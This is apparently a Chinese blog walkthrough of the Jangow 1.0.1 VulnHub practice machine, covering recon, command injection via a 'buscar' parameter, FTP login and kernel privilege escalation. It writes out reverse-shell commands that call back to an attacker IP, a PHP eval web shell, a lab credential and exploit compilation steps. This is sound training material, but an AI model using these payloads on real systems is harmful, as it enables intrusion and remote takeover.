vulnhub:jangow1.0.1靶机

最新推荐文章于 2023-05-30 23:39:45 发布
最新推荐文章于 2023-05-30 23:39:45 发布
阅读量311 收藏 1
点赞数 2
分类专栏: vulnhub靶机 文章标签: 服务器 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_63283137/article/details/127044654
版权

一、信息收集

扫描ip地址

扫描开放的端口

访问80端口

网站指纹识别,没找到CMS

扫描目录

二、信息利用

在主页发现buscar参数可疑

试试参数,发现可以执行命令

反弹shell:

nc -e /bin/bash 192.168.72.128 9696

bash -i >& /dev/tcp/192.168.72.128/9696 0>&1

无法反弹shell

三、漏洞攻击

试试写入一句话木马

echo "<?php @eval($_REQUEST[88888]); ?>" > ./one.php

蚁剑链接木马文件

在网站家目录找到第一个flag

又发现两个文件内容含有账号密码

尝试登录ftp,使用上面的两个账户密码

账户: jangow01  密码:abygurl69 ,登录成功没有什么发现

反弹shell,nc -e参数不支持,bash -i也不支持

换个语句:<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.72.128 9696 >/tmp/f");?>

写入文件2.php,并用浏览器访问2.php,进行反弹用户的shell

发现反弹不成功,试了很多反弹命令都不成功,可能是端口限制

试试https的443与http的80、一般服务器都不会限制这些端口,访问2.php并监听443

成功反弹shell,查看系统的版本内核信息

四、提权

查询系统版本的漏洞

下载脚本到当前位置

查看脚本文件的使用方法

将45010.c通过蚁剑上传到靶机目录下(建议把源文件先上传到靶机再编译)

赋予执行文件执行权限

chmod +x 45010.c

编译45010.c文件

gcc 45010.c -o 45010

执行编译后的文件

拿到root权限

完成。

腐蚀&渗透
关注
专栏目录
jangow-01-1.0.1
qq_46140711的博客
09-22 1205
jangow-01-1.0.1靶机练习
VulnHub靶机-Jangow: 1.0.1
weixin_46694260的博客
09-15 2721
迟到的文章,就当库存发出来吧~
vulnhub靶场,JANGOW: 1.0.1
kukudeshuo的博客
02-17 1976
vulnhub靶场,JANGOW: 1.0.1 环境准备 靶机下载地址:https://www.vulnhub.com/entry/jangow-101,754/ 攻击机:kali(192.168.109.128) 靶机:JANGOW: 1.0.1(192.168.109.198) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 目标:提升为root权限获取root目录下的flag 信息收集 使用arp-scan确定目标靶机 确定目标靶机
1-vulnhub靶场,JANGOW: 1.0.1
qq_49078152的博客
08-13 309
hulnhub靶机
Vulnhub靶场】JANGOW: 1.0.1
DG_s1mple
01-21 2777
时隔这么久,终于开始做题了 环境准备 下载靶机,导入到virtualBox里面,这应该不用教了吧 开机可以看到,他已经给出了靶机的IP地址,就不用我们自己去探测了 攻击机IP地址为:192.168.2.14 靶机IP地址为:192.168.2.16 渗透过程 信息收集 万事第一步,先扫描 可以看到,靶机目前就只开放了两个端口,一个是21一个是80,首先访问80端口 发现是有网页的,随便点点,看看有没有能注入或者渗透的点 发现点到Buscar时,页面变得不一样,并且网址出现了可疑的后缀 我们试着运行一
Vulnhub:PowerGrid-1.0.1靶机
qq_43884092的博客
02-10 400
利用gpg解密得到的p48用户私钥登录172.17.0.2,尝试利用ssh登录之后发现172.17.0.1登录的是靶机,172.17.0.2是docker容器。利用msf模块auxiliary/scanner/portscan/tcp扫描,发现172.17.0.1和172.17.0.2开放22端口。切换到root之后查看/root/.ssh/id_rsa,获得root用户私钥,登录172.17.0.1,获得flag。得到账号密码:p48|electrico,登录后发现一封邮件,内容提示存在另一台服务器
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。...
Vulnhub:Assertion-1.0.1靶机
qq_43884092的博客
03-07 223
aria2c是一个用来下载文件的程序,先保存目标/etc/passwd到本地添加一个新用户,之后使用aria2c覆盖目标/etc/passwd。本地开启http服务,让目标下载修改好的passwd并覆盖的passwd。查看index.php源码发现包含其他文件。尝试包含/etc/passwd发现存在限制。靶机:192.168.111.218。payload需要进行url编码。修改为构造好的payload。保存到本地后修改文件。
VulnHub PowerGrid 1.0.1靶机渗透
Jonah_Bare的博客
06-25 1203
​本文首发于微信公众号,未经授权,禁止转载。 难度评级:☆☆☆☆☆官网地址:https://download.vulnhub.com/powergrid/PowerGrid-1.0.1.ova天翼云盘:https://cloud.189.cn/t/2UN7Ffiuqyym百度网盘:https://pan.baidu.com/s/10l8dshcdaLxWL7eGN92U4Q 提取码:r4zc官网简介:靶机会进行计时,即使关闭虚拟机也不会停止,超时后将销毁证据渗透目标:获取root权限,找到4个flag本
靶场实战】Vulnhub - JANGOW: 1.0.1 靶标实战
最新发布
做自己喜欢的事,并将其发挥到极致!
05-30 1133
Vulnhub - JANGOW: 1.0.1 靶标实战
靶场练习No.1 Vulnhub靶场JANGOW01
hljzzj的博客
01-13 3116
2022年开始了,去年的6月份开始断断续续学习了半年的渗透知识,为了能持之以恒我恢复了以前不用的公众号,将我所学的内容用练习靶机的方式发布出来,也许会帮助到想入门的小伙伴们,也为了监督自己,今年的目标是200个靶机练习,小伙伴们让我们一起卷起来吧!
Vulnhub靶机:JANGOW_ 1.0.1
LainWith的博客
10-06 1203
Jangow(此系列共1台)发布日期:2021年11月4日难度:低提示信息:爆破是拿下靶机的重要手段目标:取得 root 权限 + Flag主机发现端口扫描路径枚举命令执行反弹shellftp利用内核提权靶机练习-JANGOW: 1.0.1
vulnhub靶机-JANGOW: 1.0.1
臭nana的博客
03-08 4347
Description Back to the Top Difficulty: easy The secret to this box is enumeration! Inquiries jangow2021@gmail.com This works better with VirtualBox rather than VMware ## Changelog 2021-11-04 - v1.0.1 2021-11-01 - v1.0.0 1、开机(virtualbox)直接得到靶机ip:192.16.
靶场练习】Vulnhub靶场Jangow01-练习记录
weixin_36591264的博客
02-16 3653
Vulnhub靶场Jangow01-练习记录信息收集反弹shell提权操作 信息收集 目标机IP:192.168.43.163 攻击机IP:192.168.43.118 端口扫描:nmap -sC -sV 192.168.43.163 开放21,80两个端口,通过浏览器访问80端口: 点site后,进入了一个正常的页面 点击页面上的标签,直到点击右上角Buscar的时候,页面跳转到http://192.168.43.163/site/busque.php?buscar= buscar作为一个变量,尝试
vlunhub靶机之JANGOW:1.0.1
hanjinming110的博客
03-11 178
vlunhub系列之JANGOW
Vulnhub 靶场 HMS: 1
小小猪的博客
09-08 406
查看定时任务,发现一个5分钟的脚本。查看页面源码,发现文件存储目录。python半交互模式。提权成功,查看到flag。sql万能密码登录成功。
jangow靶机渗透
qq_42307546的博客
01-23 982
今天给大家带来一个简单难度的靶机 首先主机扫描 netdiscover -i eth0 192.168.1.1/24 扫出靶机地址为 192.168.1.13 nmap 扫描 nmap -sV -p 0-6550 192.168.1.13 Starting Nmap 7.80 ( https://nmap.org ) at 2022-01-23 14:13 CST Nmap scan report for 192.168.1.13 Host is up (0.00071s latency). Not sho
jangow靶机实验实战演练
lianliandad的博客
11-02 873
Ubuntu 16.04版本存在本地提权漏洞,该漏洞存在于Linux内核带有的eBPF bpf(2)系统调用中,当用户提供恶意BPF程序使eBPF验证器模块产生计算错误,导致任意内存读写问题,攻击者通过普通用户权限可以利用该漏洞进行提升至高权限用户,获取root权限。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值